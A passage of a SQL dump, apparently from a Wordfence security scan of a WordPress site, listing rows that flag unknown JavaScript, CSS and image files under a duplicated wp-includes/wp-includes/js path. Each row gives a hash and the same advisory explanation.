tab)</span></a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/plupload/wp-plupload.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77790,1675048851,1675048851,'new','knownfile',75,'bb9cdca2d6a41c9094caf0b0ed5040b0','bef2c34e640e30c79e966c174a966af2','Unknown file in WordPress core: wp-includes/wp-includes/js/quicktags.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/quicktags.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77791,1675048851,1675048851,'new','knownfile',75,'3636e8430ea8e08a5a43a63b925eba8e','cf7eee02e8f8de9779448656eb3618c4','Unknown file in WordPress core: wp-includes/wp-includes/js/quicktags.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/quicktags.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77792,1675048851,1675048851,'new','knownfile',75,'60adf4c534f1116d60b2004b6b18d37d','55c97302912891fac431592059e21d52','Unknown file in WordPress core: wp-includes/wp-includes/js/shortcode.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/shortcode.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77793,1675048851,1675048851,'new','knownfile',75,'e57f92f98a4fdb4b56b141a6ecff9c50','32157b60ebd0696fd63f43b07049f930','Unknown file in WordPress core: wp-includes/wp-includes/js/shortcode.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/shortcode.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77794,1675048851,1675048851,'new','knownfile',75,'646b0ea843bc996cbaccadfc84415670','03e39a78bbcd9b3920357ac8f44ebd29','Unknown file in WordPress core: wp-includes/wp-includes/js/swfobject.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/swfobject.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77795,1675048851,1675048851,'new','knownfile',75,'acba1c2ccc2224760affbbf07859a8ba','a32cb12b027667b44704749165dd41cc','Unknown file in WordPress core: wp-includes/wp-includes/js/swfupload/handlers.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/swfupload/handlers.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77796,1675048851,1675048851,'new','knownfile',75,'fae70ea06fc7cd8bf6e05cbeea192c29','104282a4d4d6198c9107bdf879f2d366','Unknown file in WordPress core: wp-includes/wp-includes/js/swfupload/handlers.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/swfupload/handlers.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77797,1675048851,1675048851,'new','knownfile',75,'09f2a09a6c0ce890d5bf1aa708e70270','8f27d80821af0a3fe18ae3aba54a31b9','Unknown file in WordPress core: wp-includes/wp-includes/js/swfupload/license.txt','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/swfupload/license.txt\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77798,1675048851,1675048851,'new','knownfile',75,'6b77944cd900626fae9515bea626ffc1','0edcfd75421e9e207daa228c7380d529','Unknown file in WordPress core: wp-includes/wp-includes/js/swfupload/swfupload.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/swfupload/swfupload.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77799,1675048851,1675048851,'new','knownfile',75,'bf88063d130a83d366b9bdc0528e72a6','30136f95cec3913729f4cc6b0774253e','Unknown file in WordPress core: wp-includes/wp-includes/js/thickbox/loadingAnimation.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/thickbox/loadingAnimation.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77800,1675048851,1675048851,'new','knownfile',75,'55e3a8c813b6cc58b6d833770242e9f8','ef92e75aa80c53eae9080eca495ba086','Unknown file in WordPress core: wp-includes/wp-includes/js/thickbox/macFFBgHack.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/thickbox/macFFBgHack.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77801,1675048851,1675048851,'new','knownfile',75,'6f53ab874e618b816ee721009bdb53b5','581ec418291fa36f1ba298fb71f782ff','Unknown file in WordPress core: wp-includes/wp-includes/js/thickbox/thickbox.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/thickbox/thickbox.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77802,1675048851,1675048851,'new','knownfile',75,'b7c965e39138888708fbc4890ec1d968','4a36a912783978cf9e4088d18424146e','Unknown file in WordPress core: wp-includes/wp-includes/js/thickbox/thickbox.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/thickbox/thickbox.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77803,1675048852,1675048852,'new','knownfile',75,'c71e81dce7dcafb493637ccd60260b04','74aef08791c91e12b36eb0c29bc8531e','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/langs/wp-langs-en.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/tinymce/langs/wp-langs-en.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77804,1675048852,1675048852,'new','knownfile',75,'bfca04010213b07658c0db50a538c4f3','172f90c754b828e4ff450b717e251a47','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/license.txt','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/tinymce/license.txt\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77805,1675048852,1675048852,'new','knownfile',75,'c9953f51b8caa4a6bd77891a181523b5','6e27fc0d83353e3799f3e8772a06c790','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/charmap/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/js/tinymce/plugins/charmap/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77806,1675048852,1675048852,'new','knownfile',75,'0261303a9f3241c07641f34d2713fc42','2482398f3bff81105e8bce57da064da2','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/charmap/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/js/tinymce/plugins/charmap/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77807,1675048852,1675048852,'new','knownfile',75,'91969b8d666abd5bb2ec94224a6bbce8','098b3d4dd33c1a5b577bc9fcc83553ab','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/colorpicker/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/js/tinymce/plugins/colorpicker/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77808,1675048852,1675048852,'new','knownfile',75,'8fd0456e10499b4977cbc405e2b0c843','df44bfe07a78b51a907c3b6e22d501af','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:68:\"wp-includes/wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77809,1675048852,1675048852,'new','knownfile',75,'fc102afaec9cc8c7305387d6b05a2823','79300e38e77ad6abcbfd42bb9d516e39','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/compat3x/css/dialog.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/tinymce/plugins/compat3x/css/dialog.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77810,1675048852,1675048852,'new','knownfile',75,'7ea8db9a1a697d2f78fa629145f48731','3a4f2cba78bc0b2fafa8cceba2476d21','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/compat3x/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/tinymce/plugins/compat3x/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77811,1675048852,1675048852,'new','knownfile',75,'f74536056c1dfd101be764462a6052ec','ef2e401c835cf5800f5e8567d59c40af','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/compat3x/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/js/tinymce/plugins/compat3x/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77812,1675048852,1675048852,'new','knownfile',75,'d170b7a19efaa50ee62fee281b430c41','e6b6054b3d2969126410d18536553043','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/directionality/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/js/tinymce/plugins/directionality/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77813,1675048852,1675048852,'new','knownfile',75,'facacec8b83635fe55893d60e7c8ed7c','0658a65d6d22b8bb5afc36de67d06592','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/directionality/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/js/tinymce/plugins/directionality/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77814,1675048852,1675048852,'new','knownfile',75,'6ef289cd5a1c5d43a8acf6018ff2975e','c822f5c98a92ac4c3636c9af10fa90e5','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/fullscreen/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/js/tinymce/plugins/fullscreen/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77815,1675048852,1675048852,'new','knownfile',75,'8f76dc17d43e3d3d01142cf69da6da6f','ac94ccdeacb12571b369f3cdfb682d0c','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77816,1675048852,1675048852,'new','knownfile',75,'06ac43458945cea8053ca2da2946f1f1','4dfa0439e32091f39824867759bed2ad','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/hr/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/tinymce/plugins/hr/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77817,1675048852,1675048852,'new','knownfile',75,'7272a1a1202101ec3237005b722a152e','156c208b562f5c7bdb2a1b0b1e6635b0','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/hr/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/tinymce/plugins/hr/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77818,1675048852,1675048852,'new','knownfile',75,'bdff3d30779f73059779cfa82ec6c984','195850c94bdd6d3c5f03d57c3076c2ea','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/image/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/tinymce/plugins/image/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77819,1675048852,1675048852,'new','knownfile',75,'6dc054dc2f32d8a9b1447fa6a7b9e767','da29389e9f121175245de32f9776271c','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/image/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/tinymce/plugins/image/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77820,1675048853,1675048853,'new','knownfile',75,'2c933a8d714d0e01d04d95a36765507f','580b3305dd239d2b81aeacff371b7d60','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/link/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/tinymce/plugins/link/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77821,1675048853,1675048853,'new','knownfile',75,'3bc3b37d93ac53679eedb61d18747e2c','62a92899782cc6fd74d4f00a8f3e79e4','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/link/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/tinymce/plugins/link/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77822,1675048853,1675048853,'new','knownfile',75,'53480c1a8b59464c728c310a3d2b63a8','73e6c5c3a5fb0bd9d12d2eea8bc852e8','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/lists/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/tinymce/plugins/lists/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77823,1675048853,1675048853,'new','knownfile',75,'e5e700c33b4a26bd92b52edd7deb4bb1','9f550f7bfc58497abd382e86be426e52','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/lists/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/tinymce/plugins/lists/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77824,1675048853,1675048853,'new','knownfile',75,'b16709942bcd747aeb66d897228f5f94','96a9cebd4deda94dfea6c16bb051ea7f','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/media/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/tinymce/plugins/media/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77825,1675048853,1675048853,'new','knownfile',75,'a7f7cfd8681939ba30546a7e87e4790b','dd7c2c8cdf6b577ea51d669b311b49b0','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/media/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/tinymce/plugins/media/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77826,1675048853,1675048853,'new','knownfile',75,'066b46ed115e9879b40432f5d5871264','f22eeb040811d90f9ee875a0f02c6941','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/paste/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by 